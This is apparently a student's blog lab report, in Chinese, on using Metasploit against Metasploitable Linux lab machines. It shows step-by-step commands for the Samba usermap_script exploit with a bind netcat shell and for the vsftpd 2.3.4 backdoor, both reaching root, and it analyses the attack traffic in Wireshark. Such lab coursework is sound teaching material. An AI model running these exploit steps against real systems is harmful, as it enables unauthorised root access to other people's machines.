20232821 2023-2024-2 《网络攻防实践》实践7报告

于 2024-04-26 09:23:49 发布
阅读量924 收藏 9
点赞数 17
文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75467820/article/details/138196596
版权
本文详细描述了使用Metasploit进行Linux远程渗透攻击的过程,涉及Samba服务Usermap_script漏洞利用和攻防对抗实验。通过实际操作展示了如何识别漏洞、选择payload、设置参数并进行攻击,同时介绍了防御方如何通过网络监听分析攻击。
摘要由CSDN通过智能技术生成

20232821 2023-2024-2 《网络攻防实践》实践7报告

一、.实践内容

1、使用Metasploit进行Linux远程渗透攻击
使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

  • 启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
  • 使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
  • 选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
  • 设置渗透攻击参数(RHOST,LHOST,TARGET等);
  • 执行渗透攻击;
  • 查看是否正确得到远程Shell,并查看获得的权限。
    **2、实践作业:攻防对抗实践 **
  • 攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
  • 防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

二、实践过程

实践1:使用Metasploit进行Linux远程渗透攻击
使用kali(192.168.200.6)作为攻击机,Metasploitable(192.168.200.123)作为靶机:
在这里插入图片描述
在这里插入图片描述
进行连通性测试,两台主机之间能够ping通:
在这里插入图片描述
在kali攻击机中,使用msfconsole启动Metasploit渗透软件:
在这里插入图片描述

输入search samba ,找到针对usermap_script安全漏洞的渗透攻击模块名称为exploirt/multi/usermap_script:
在这里插入图片描述
通过命令use exploit/multi/samba/usermap_script使用渗透攻击模块:
在这里插入图片描述
输入show payloads,查看payload类型,显示所有可用载荷。在选择攻击载荷的时候,建议选用和meterpreter和reverse相关的载荷:
在这里插入图片描述
set payload cmd/unix/bind_netcat设置攻击的PAYLOAD为cmd/unix/bind_netcat:
在这里插入图片描述
使用show options,会列出模块所需要的各种参数:
在这里插入图片描述
设置靶机地址和攻击机地址:
在这里插入图片描述
输入run进行攻击:
在这里插入图片描述
输入ifconfig检查,显示了靶机的ip地址,攻击成功:
在这里插入图片描述
进入shell模式,输入whoami查看权限,发现已经是root权限,所以无需提权:
在这里插入图片描述
实践2:攻防对抗实践
攻防对抗由我和陈彦霖同学协作完成。
1、攻击实践

虚拟机ip
kali(吴煦雯)攻击192.168.239.236
Meta(陈彦霖)防御192.168.239.147

在这里插入图片描述
在这里插入图片描述
测试连通性:
请添加图片描述
在这里插入图片描述
攻击的过程和上述第一问重复,不再次叙述,陆续输入以下代码即可:

msfconsole#启动Metasploit渗透软件
search vsFtp#搜索漏洞信息
use exploit/unix/ftp/vsftpd_234_backdoor#选择渗透攻击模块
show payloads#查看攻击载荷
set payloads payload/cmd/unix/interact#设置攻击的payload
set RHOST 192.168.239.147#设置靶机地址
set LHOST 192.168.239.236#设置攻击机地址
run#开始攻击
whoami#查询权限,发现已经获得了root权限

过程相关截图如下:
请添加图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
2、防御实践

虚拟机ip
kali(陈彦霖)攻击192.168.239.234
Meta(吴煦雯)防御192.168.239.204

IP地址和测试连通性不再次叙述,着重分析wireshark抓包的过程。使用wireshark在一旁嗅探,抓到攻击过程的数据交互,端口等相关信息如图:
在这里插入图片描述
通过tcp数据流跟踪,可查询攻击指令过程:
在这里插入图片描述

3.学习中遇到的问题及解决

  • 问题1:实践1 攻击机ping不通靶机。
  • 问题1解决方案:攻击机和靶机同时改成net模式,且确保在同一网段即可。
  • 问题2:实践2 找视频中的vsftp漏洞,no session。
  • 问题2解决方案:重新装了个Meta2虚拟机,这个虚拟机上有vsftp漏洞。

4.实践总结

上次实践是在与windows相关的攻防,本次实践将Windows靶机换成了Linux,通过本次实验了解了一些Linux操作系统攻防以及一些漏洞的知识,通过对其他主机进行攻击,并夺取控制权的过程。找了半天新的漏洞,结果是虚拟机的问题,安装一个Meta2完事。

20232821-吴煦雯
关注
  • 17
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2023-2024安服安全技术研究白皮书(正式版)》
06-27
### 2023-2024安服安全技术研究白皮书核心知识点解析...过这些详尽的研究和实践案例,《2023-2024安服安全技术研究白皮书》不仅展示了安服团队在网络安全领域的深厚积累,也为行业内的其他组织提供了宝贵的参考和指导。
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3846
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
20222807 2022-2023-2 《网络攻防实践》第七周作业
cc3da的博客
04-19 148
网络攻防实践》第七周作业
20222948 2022-2023-2 《网络攻防实践》第5周作业
Henry__Zhang的博客
04-06 270
网络攻防实践
20222922 2021-2022-2 《网络攻防实践实践报告
qq_21274765的博客
03-29 610
使用Snort对给定pcap文件(第4章中的解码网络扫描任一个pcap文件,之前的实践已经提供了,请在云班课中下载)进行入侵检测,并对检测出的攻击进行说明。(2)只允许特定IP地址(如局域网中的Linux攻击机192.168.200.3),访问主机的某一网络服务(如FTP、HTTP、SMB),而其他的IP地址(如Windows攻击机192. 168.200.4)无法访问。可以看到metasploitable还可以正常访问kali的ftp服务,而windows上访问ftp登录无回应。
20221902 2022-2023-2 《网络攻防实践》第五次作业
xiannvyeye的博客
04-01 295
防火墙(Firewall)技术是过有机结合各类用于安全管理与筛选的软件和硬件设备,帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障,以保护用户资料与信息安全性的一种技术。
华中科技大学网络攻防实践相关
02-14
华中科技大学网络攻防实践相关
网络攻防实践_课程报告.zip
07-19
网络攻防实践_课程报告.zip
网络攻防技术实践-防火墙.doc
05-12
网络安全实验
网络攻防技术实践-NIDS.doc
05-12
网络安全技术实验
20222810 2022-2023-2 《网络攻防实践》第1周作业
m0_73792054的博客
03-04 267
20222810 2021-2022-2 《网络攻防实践》第1周作业
Metasploitable2靶机渗透学习
最新发布
m0_65712192的博客
05-19 6728
Metasploitable2靶机渗透学习
20222806 2022-2023-2 《网络攻防实践》第一周作业
qq_34529750的博客
03-08 520
桥接模式桥接模式就是将主机网卡与虚拟机虚拟的网卡利用虚拟网桥进行信。在桥接的作用下,类似于把物理主机虚拟为一个交换机,所有桥接设置的虚拟机连接到这个交换机的一个接口上,物理主机也同样插在这个交换机当中,所以所有桥接下的网卡与网卡都是交换模式的,相互可以访问而不干扰。地址转换模式在NAT模式中,主机网卡直接与虚拟NAT设备相连,然后虚拟NAT设备与虚拟DHCP服务器一起连接在虚拟交换机VMnet8上,这样就实现了虚拟机联网。Host-Only模式。
20221902 2022-2023-2 《网络攻防实践》第一次作业
xiannvyeye的博客
03-03 637
网络攻防环境搭建
20222817 2022-2023-2《网络攻防实践》第七周作业
fuast_liu的博客
04-26 235
Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行,影响Samba的3.0.20到3.0.25rc3 版本,当使用非默认的用户名映射脚本配置选项时产生,过指定一个包含shell元字符的用户名,攻击者能够执行任意命令。输入ifconfig查看IP地址,发现这里显示的IP地址就是靶机的IP地址,说明攻击方已经成功获取到了防守方的访问权限。攻击方还输入了ifconfig查看IP地址,发现这里显示的IP地址就是防守方的IP地址,说明攻击方已经成功获取到了防守方的访问权限。
20221905 2022-2023-2 《网络攻防实践》 第7周作业
永远骄傲和完美永远不妥协
04-19 276
网络攻防实践》 第7周作业
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
kali与靶机网络配置问题
leo788的博客
01-04 3651
前提:kali宿主机和靶机都使用的NAT网络配置,然而无论是arp-scan还是nmap还是netdiscover都找不到靶机ip,正常情况下可以找到。
2021-08-29 网安实验-Linux系统渗透测试之Metasploit攻击linux实例
热门推荐
时光隧道
08-29 8万+
一:扫描端口 nmap -sT -v 10.1.1.136 扫描漏洞主机开放端口信息,扫描结果如下: 其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。 二:UnrealIRCd后门漏洞 1.输入msfconsole命令 2.运行“search unrealircd”命令 3.运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP 4.使用“show options“ 命令查看该expl
网络攻防实践:搜索引擎扫描与漏洞检测
"网络攻防实践之搜索引擎扫描器攻击.pdf" 在网络攻防实践中,搜索引擎扫描器扮演了重要的角色。搜索引擎,尤其是Google,由于其多语言支持、高速度和高精度的搜索结果,常被用于发现潜在的安全问题。扫描器则主要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值